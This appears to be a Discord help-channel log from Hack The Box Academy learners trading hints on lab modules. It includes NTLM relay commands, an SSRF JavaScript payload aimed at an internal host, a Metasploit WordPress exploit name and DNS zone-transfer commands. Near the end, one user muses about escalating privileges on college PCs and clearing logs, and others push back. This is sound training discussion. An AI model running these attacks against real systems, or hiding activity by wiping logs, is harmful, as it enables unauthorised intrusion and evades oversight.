unless you're just referring to the IP
you don't need to specify saying "IP number"
some windows machines don't respond to pings so needing to do -Pn
I tried but it gets stuck or something I have to cancel
"gets stuck"
maybe not stuck but didnt finish
ok
anyone?
you can press space to see progress
you'll get more flies if you actually ask your question
I remember u told me something about the VM switching off, did you mean that I lose connection when I switch to Discord or other software or what?
I created a notification like the one in the module, then I tried to run crackmapexec, but it didn't work
?
when you shut the vm down you need to reconnect to the vpn when you turn it back on
it has nothing to do with switching software
ah ok, because I keep losing the connection on HTB lab, don't understand why ..
then message website support/change vpn region
I don't know what I'm doing wrong
when I nmap -Pn It says all 1000 are in ignored states
tcp no response ...
Anyone regarding my question for crackmapexec please?
where
ps aux |grep openvpn if you have more than 1: then you're running multiple
also #starting-point is for the starting-point machines
:)
I meant actually helpful advice
i mean if you included what you've already tried, we can give you more pointed advice
otherwise it's a skill issue; the links in my BIO are for some good reads
https://dontasktoask.com is a good read on how to ask questions in a forum
@next bronze regarding the last 2 questions for the skills assessment
If you can't tell where and how you are stuck, you're asking other people to think for you
the most advice we can give with 0 info is: enumerate
double check the sections on revealed ports and how to get at them in a meaningful way
yes what is your question
we're not gonna tell you to "well do this first, then that, then this" because that defeats the purpose of you supposedly having learned this stuff from the module
@next bronze I can't answer the last 2 questions
do we have a troubleshooting forum for academy? I have being experiencing connections issues during different exercises. I did re-download the VPN file just in case and didn't work.
I scanned the box and I'm trying to find a way to dump the private key
I need some help, hints, ....
I had only 1 =/
Nmap won't give me a version on 2121
how am I supposed to give them when I don't know what you have and what you have tried
you don't need version
@next bronze Can I post here or is it spoiling?
ftp supports a command like "get"
just tell me what users you have, put it in spoiler tags
scan both tcp & udp
||james, juliette,intern30,svc_devadm,atul||
spoiler tag is || at both ends but check ||gmsa||
roger that
@next bronze I have that service account
Is there a reason I can't find the High Level Alert with ZAP Scanner for the Web Proxies module? I had to manually find the vulnerability and exploit it myself. I tried using active scans with full complete settings enabled on both my local machine and the pwnbox and got zero high alerts.
oh right, check what interesting programs is installed that can be abused
I reset the instance multiple times as well
@next bronze ok, I will try, thanks
I searched for keepass briefly but haven't found it, i will retry tomorrow
guys & girls, need help with the last question of the NTLM Relay Module, lesson "NTLM Cross-protocol Relay Attacks". I've run: 1. sudo ntlmrelayx.py -tf relayTargets.txt -smb2support -socks (#after sudo su -); 2. started Responder; 3. proxychains -q mssqlclient.py INLANEFREIGHT/nports@172.16.117.60 -windows-auth -no-pass (#this errors out as connection refused). Can someone point out to me where i went wrong?
that should be pretty obvious what you need to do, read the sections again
i am working the web proxies module and I experiencing connectivity issues trying to access the exercises. Had you have any issues with them?
read carefully: you do have creds
I haven't had any issues connecting
if it's the one with 2121
thanks, I guess it's something on my end then.
that's why i said read their bio, it will help you to ask the right question
ah my bad g
you should target mssql specifically in your relay targets
@next bronze thanks,
I probably missed something in the course
I tried that as well. I have also tried doing all://ip after switching responder's servers off, but both to no avail
try to follow the steps in the module, and make sure the username is right
this is my command: root@ubuntu:~# sudo ntlmrelayx.py -t mssql://INLANEFREIGHT\NPORTS@172.16.117.60 -smb2support -socks and the output is this: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, but there are no more targets left
flip the \
pretty sure you're supposed to put only proto and ip in the ntlmrelax target: mssql://172.16.117.60
that's how it's taught in the lesson but I've tried both ways and still nothing
tried that as well but the only response is SMBD-Thread-67: Received connection from 172.16.117.3, attacking target mssql://172.16.117.60
[-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]
I've been at it since yesterday and it's slowly driving me crazy. Every other question went fine.
hm let me check it
Thank you, it might be something completely stupid on my part but I'd really like to know what it is then
for the server_adm section, are you suppose to crack the windows ntlm hash to get admin access?
for windows privilege escalation module
I just copied the 3 commands and it worked
you can always pth
Hello all - im doing xpath blind exploitation.
I have exfiled the node's name, but when i start exfiltrating the number of child nodes im confused by what I am reading. I know i have the right number of child nodes. But what does it mean that we can return to the previous step? none of the previous steps give a successful "message sent" prompt when i try what i am told to reveal the schema
What is all this related to?
I just retried it and still not capturing socks with nports
Coding?
ah ok I see the problem
ntlmrelayx.py -t mssql://INLANEFREIGHT\\NPORTS@172.16.117.60 -smb2support -socks
computers
technology
Looking to get some help if possible. I'm going through the Web Enumeration section, within the "Cracking into Hack the Box". Trying to do a whatweb on the target, curl and a goBuster is all failing/timing out.. Would anyone know why?
failing and timing out? make sure the target is active as silly as that may sound if i understand your question
Target is indeed active, showing 80 minutes of life left. :/
can i see your command?
whatweb 83.136.253.251
ERROR Opening: http://83.136.253.251 - execution expired
Do i need to include the port? The example above didn't..
whatweb http://ip:port
try
yup, that worked. Assuming that would be the same for Gobuster?
yes
gobuster dir -u http://83.136.253.251/ -w /usr/share/dirb/wordlists/common.txt
Error: error on running gobuster: unable to connect to http://83.136.253.251/: Get "http://83.136.253.251/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
ah yeah, adding the port fixed it. Thank you @lusty thicket
ok, i deserved the frustration. I tried this exact command but when i did with the domain and the user I misspelled the username (used the question spelling which is NPORT and not NPORTS)...
Thank you, it was kind of you
has anyone done the senior web app module?
im stuck and its not a technical thing but odd wording in the doc
im doing xpath exfiltration
happens, but check the usernames next time. both ntlmrelayx and responder output the usernames, which was also the first thing I asked you to do
Hackers can't splel
Likely the step just above. Or the previous section
it...doesnt work
i don't understand why whoever wrote this document didn't add an example... "step" there are none, and you want me to plug this in where, and change how much of my payload?
2 days
I mean is it not the XPath code just above the image?
correct
and I added the /users/*[2] but in place of users i used the account i exfiled. i get user does not exist error
Try changing the =1 to =2
Which is what the image shows
Don't use brackets
See if you get info that way
Also discord is formatting your messages
count is a function
To prevent this. Wrap in backticks (`)
review the example image
Do what it's doing
I haven't done this module, just walking through how I'd approach it ¯\_(ツ)_/¯
yeah
Just review what it's taught so far
will do just annoyed its because the writing is weird
It looks like it wants you to put that code into the bracket, not just the direct number
I'm back for more help.. I'm now on the Exploits section for Cracking into HTB and trying to nmap my target, although it comes up with the following..
$ nmap -sV 83.136.250.104
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-09 23:58 GMT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.20 seconds
I then try to add the -Pn Flag and it fails to provide more info..
$ nmap -sV -Pn 83.136.250.104
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-09 23:59 GMT
Nmap scan report for 83-136-250-104.uk-lon1.upcloud.host (83.136.250.104)
Host is up (0.0070s latency).
All 1000 scanned ports on 83-136-250-104.uk-lon1.upcloud.host (83.136.250.104) are in ignored states.
Not shown: 915 filtered tcp ports (no-response), 85 closed tcp ports (conn-refused)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds
I'm trying to get the versioning of the services running on the domain, and I believe I should be using the -sV flag to pull this right?
You're given a public ip and port
Nmap won't be useful
Ah ok, so would nmap only be useful when you have just an IP and no port?
Explore different enumeration methods, i.e. visiting the page in a browser
Well. To be more specific, public ip = not internal - so throwing Nmap at it is like scanning a random website
Oh, so I've completely misunderstood the use case. nmap is for internal IPs and Web Enumeration is for public IPs?
If you want accuracy with Nmap in these cases you would be -p port
Basically, 99.999% of public facing ips are websites
And in the case of htb: it will almost always be one, unless directed otherwise
okie doke. Thank you! I'll keep plugging away at it!
I suggest the intro to networking module
Also fwiw the module is called Getting Started, not Cracking into HTB (that's the name of the path you're doing)
That's how I know where you're at
Module is generally in the title of the page or all the way at the top, then section name is well what part of the module you're doing
A lot of paths share modules
Ya, apologies. At least next time I'll be more accurate in telling people where specifically I'm asking for help. Thank you again!
it's not necessarily true, nmap is good for probing what ports are open and what services are running, in this case you were given one port so it's less effective. it all depends on the situation, you'll learn more on how to use it as you go further into the path
Not in the Cracking into HTB path. AFAIK that's only a few modules
ah right, meant the cpts path then
I dont think it includes network enumeration with nmap
After this module: highly recommended the information Security foundation path
The linux one can be a little frustrating
Has anyone attempted the Supply Chain Attacks: DevOps not so secret Module?
Ok, thank you. I'll be sure to check that out!
Just ask your question.
https://dontasktoask.com
I will say, you did a good job of providing what you've done so we can guide you better
I need assistance or guidence on this.
Thanks, I have an IT background. So fully relate to the pain of someone asking for help and providing little to no information.
An update, I have managed to find out a version and now seeking an exploit
OK. But you haven't actually stated your question, what you've done/tried
We can't help you if you don't provide us more than just "I'm stuck"
It's pretty simple from there if I remember
Now you've done it, watch me stuff it up!
You'll find I tend to word things with a purpose
I trying to send a screen shot
To avoid spoiling as much as possible while still nudging
You need to link your main htb account to send screenshots #welcome
It's appreciated
It's this way to prevent skids and dumbasses from posting troll images
Not to mention. 9 times outta 10, the info is right in front of you
omg @fathom pendant and @lusty thicket i think i get the dns nameserver zone thing. so when i typed in this: nslookup -query=AXFR inlanefreight.htb 10.129.87.222 and got that big list, we have the ns on that ip address and then there is a localhost address with ns in it as well, meaning there are 2!
does that sound accurate? sorry, just had a break through lol
For sure, sometimes you (I) end up overcomplicating it in my head
"It can't be that simple"
Narrator: it was
ok still at a loss
sooooo.... new to HTBA. I am stuck in the windows event logs and finding evil - logging basics. Trying to find the executable that triggered the event with ID 4624
replace the ip from the example with the ip of the spawned machine
:) if you didn't spawn the machine: then that will be why
How you spawn it
i suggest you do the "getting-started" module
and "introduction to academy" module
that explains how to interact with academy
but in short: green text that says "Click here to spawn target"
ngl, I'm struggling to find the right exploit to use...
visit the webpage; it's kinda hard to miss
Ok, so im on the website, assuming it's a ||plugin exploit?||
yes
bingo
I just tweaked the search. I think I got it now.. jesus it's too late
I must be actually stupid, the exploit is failing because auth failed to the target.. Do I need to do multiple exploits here?
you don't need auth
it's only one exploit
This is the one I'm trying to use ||exploit/multi/http/wp_plugin_backup_guard_rce 2021-05-04 excellent Yes Wordpress Plugin Backup Guard - Authenticated Remote Code Execution||
oh my
I am so sorry....
well if the exploit says it needs to be authed and you dont have auth, then its not gunna be it
¯\_(ツ)_/¯
I was just searching the wrong thing for the past 30 odd minutes...
simple
it's part of the plugin's name too
I told you... I was searching ||Wordpress|| not the bloody || plugin name||
did you add the gitea and jenkins .inlanefreight.htb to your /etc/hosts?
And done, that was the hardest challenge yet. But at least I know how to use MSF now
I really do appreciate the help @fathom pendant
np
yeah general advice with wp is that vulns are almost always going to be just plugins or themes. WP core vulns are pretty rare.
Awesome, thank you!
another dns zone to check essentially?
yes, now trying to go str8 jenkins
because it's 127.0.0.1
also careful with your screenshots as they can be spoilery
while you did block out the answer in the one, the answer is still contained in the other screenshot @shrewd hazel
:)
deleted
but what does it being localhost address have to do with it?
im confused on that separation of dns zones here, or maybe that's the whole point why it was different lol
bc that was the give away to further investigate that one with the localhost ip
the IP controls 2 zones :)
and generally a zone will be tied to the same machine
its been added
just at app1
Hi - wondering if anyone can help. I'm trying to load the Pass The Hash Target, and it keeps hanging at Target Is Spawning. I've tried logging out fully and logging back in. Any ideas?
(my vpn is connected as well. I'
*I'll try re loading another VPN connection file
change vpn servers
will do
Hello
Kindly, can I have some help regarding the injection attacks module assessment challenge? I'm able to retrieve the local files but not able to access anything via http. I thought that the solution is a combination of xpath injection and ssrf, but I cannot understand or think how to perform that. I tried some ways but no luck, so any help please
Can anyone explain the following from the Web Requests module (POST section):
"as would be the case with a file uploaded through a GET request."
Can you upload a file through a GET request? Is it like, exfil through a GET request's field?
Kindly can help @misty current
@round sable kindly can u help
tried switching to new VPN, from udp to tcp, target still won't spawn
maybe change region to EU or some others?
I've also rebooted both my pc and vm
I'll try that
it can by encoding the file and sending it as a url parameter, but it's strange that it's included in the post section
It's comparing why POST is "better" than GET for file upload... so that can be done, cool beans thanks :))))
EU/TCP finally worked, maybe there's maintenance going on US servers
thanks for the help
waiting for the target to spawn after 30 whole minutes......
Yes
What do you mean by not being able to access anything via http? Have you retrieved the source of the internal application?
Down for me too. Their systems are down, it usually takes a few hours to fix
When using js code like the following to access the internal application, it always responds to me with ||host not found or connection refused on the other ports ||
<||script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","http://127.0.0.1:80");
xhzeem.send();
</script>||
||<iframe src=http://127.0.0.1:80></iframe>||
||But I was able to retrieve the /etc/passwd||
Ah, you haven't found the right ||port|| I believe nothing is running on 80
Also, make sure to cover sensitive information with spoilers
Don't want to spoil others yaknow?
Ah got it, many thanks bro and will make sure to cover sensitive info
There are two approaches you can take to find the ||service port||. I'll let you think about it. You can let me know if you are still stuck.
Nice, you can directly edit it and hide them with spoilers
It has returned the prophecy can continue!
Not for me rippppp
There is a URL payload that executes XSS due to prototype pollution.
I have identified an operation that the administrator can execute, but I can't think of a way to exploit it. Is there a way to...
The question is Client-Side Prototype Pollution in the Whitebox Attacks module.
Haven't done the module but, if you got XSS, first thing that comes to my mind is CSRF.
But, again. I haven't done it and I'm giving you ideas.
can anyone help me??
ACL Abuse section, I'm getting an error:
This is following the lesson verbatim, with the exception of picking my password for the wley user
Ignore the first error.
really?
The machine is slow
I entered the command twice
"I followed everything except I made up a password for the user im authenticating as, why am I getting an error that the username or password is incorrect?"
So the second error in red is the one.
This is all it showed. I thought I picked a password based on the <PASSWORD HERE>
Am I somehow supposed to know wley's password
Good to know thanks, I'll go dig for it.
read what $Cred is doing for you here
youre not making up credentials, its how you authenticate as a different user for a powershell command
so the credentials have to be valid
I don't see the wley password in the previous modules.
Do you remember what module it was?
I have forend, sgage, and vmware
did you run the notification
it doesnt tell you outright, you find it as part of the labs
iirc
wley might be early enough that it just told you but idr for sure
it actually does tell you outright, look harder
Ah, found it, thanks
Is there a reason I got this error and it still added damudsen?
read carefully what the error is
hello everyone, which wordlist should I use to find the host that holds the byte I'm looking for, for the last question? because i can't find it https://academy.hackthebox.com/module/112/section/1069
2 parts of this, make sure you're looking at the right subdomain; 2 it's a very fierce list
the final answer will be like a.b.inlanefreight.htb
okay thanks, I'll test and get back to you here
it's weird can't find the domain with the ip ending with 203 :/ i did all the zone transfer of the domain
Remember that a zone can be configured to only allow zone transfer from specific servers.
using the bruteforce tool that's shown in the module should be how you get it
thanks. I'm doing a brute force on the internal subdomain, I don't know if it's useful but we'll see.
go through each subdomain until you get the answer ¯\_(ツ)_/¯
that's all we can really do; 90% of the way there, just gotta use the right one
yes that's what i did with dig axfr but nothing i'll try again surely i missed some information
axfr won't get you far
this is why the hint for the question references wordlists
I still don't see what I'm doing wrong :/
dnsenum
you need to/should be using that tool
like i said it's directly mentioned in the section
also fierce hostlist misses on some of the actual subdomains present on this host
since you can already zone transfer to inlanefreight.htb; why not build a subdomain list based off that first
then use that to determine how to attack the problem
god, it took me 7 hours to get through 3 sections of the password attacks module
only... 6 more sections and then I reach the final skills assessment.
XD
How do I learn to hack machines?
just happy i did everything mostly without help
I am learning a lot of stuff but seems like they are in disarray
Where can I find topics in order that will guide me towards hacking machines?
no money in pocket
capitalism already robbed me
as I said; that wordlist skips over a very important subdomain
viva la resistance!
Ai, maaaate!
information security foundations path and cracking into htb path
first do a regular dig against that subdomain and you'll see what you missed
could use some free resources for now
the tier 0 modules ARE free my dude
ahhhhhhhhhhh ok ok, sorry, my brain is starting to burn. It's 7 o'clock and I'm starting to get saturated lol, but I'll figure it out before I go to sleep.
once you complete them you get the 10 cubes back
I would suggest but this is HTB talk only
can I DM you or is DMing not allowed here?
my strat was dig axfr inlanefreight.htb @ip | grep -E "\bA\b" | cut -d "." -f 1 | sort -u for my list to start with
nah; I don't trust your intentions, wouldn't tell you personally.
then you can either manually sub each subdomain in with dnsenum; or do a loop
you plannin something illegal i can smelly
Google is a free resource :) the starting-point machines have walkthroughs which you can use to study
My intention is only to take control of your credit cards and crypto wallet. I don't want anything more than that. You have my words on that, bro
I knew it! >.<
I was always a man of pure intention
that's right
but the problem is things are disorganised
well yes, there's a lot of assumptions made in starting-point. i.e. you have a working knowledge of linux basics
It's 1AM where I am, I want to finish pth stuff, but my eyes are stinging
I know Linux command line basics, basic networking like TCP/IP, a little bit of nmap and Wireshark, web vulns like SQLi, XSS, command injection and getting reverse/bind shells. What should be my next topic to start hacking machines?
it seems like I am learning stuff but cannot see how it fits in the big picture
like i said: do starting-point to gauge your knowledge
that's what's giving me "I am not going anywhere" feeling
okayy
attempt an easy machine, see how you feel about it with your current knowledge
google the gaps that come up
remember nibbles? xD
crazy little rollercoaster, nibbles was in the getting started module, I'll never forget it
¯\_(ツ)_/¯
looking back it makes sense
using tools like gobuster and uploading exploits then the last piece of the puzzle
never heard of anyone adding sudo privileges on a program to a user though. I didn't even know that was a practice
sticky bits/suid bits
when did i tell you to do it against internal?
my command was explicitly for inlanefreight.htb domain
:) btw dnsenum can take subdomain.domain
since internal.inlanefreight seems to be a dead end; STOP GOING AFTER IT
that's the problem; you think there's more to gain - when there's not
really cool privEsc stuff
gtfobins is goated
After learning it I was having some evil thoughts. My college PCs don't have admin privileges. I was thinking of PrivEscing and getting admin.
Then finally I would be able to install and play some games during my class breaks.
careful with that :) likely to have disciplinary action if caught
I wouldn't do anything to cause harm. Just would have some fun during my break time
so I guess I should be safe
it's still likely against policies
just do what people in my school did to install halo: find a writable folder to install into :P
Yeah. But I don't think our admin is skilled enough to spot me
Even our website is super buggy and easily gets down under small visitor load
i.e. my school had a "tech liason"
most school websites are built like ass
either way
I guess I need to clear the logs then?
not the place to discuss this; read #welcome on how to access more of the server
there's places like #general and #starting-point
also instead of just doing something silly like installing some shit software; why don't you learn how to make their infra better :) and offer to help as a school project
bro that's still a crime
that you could face jail time for
They are not welcoming
Then imagine how they'd react if they found out you installed a game :)
I am already in a jail named "Capitalism"
not causing harm still doesn't mean it's the right thing to do
cringe
No!
bro idgaf, it's your life to fuck around and find out with, not mine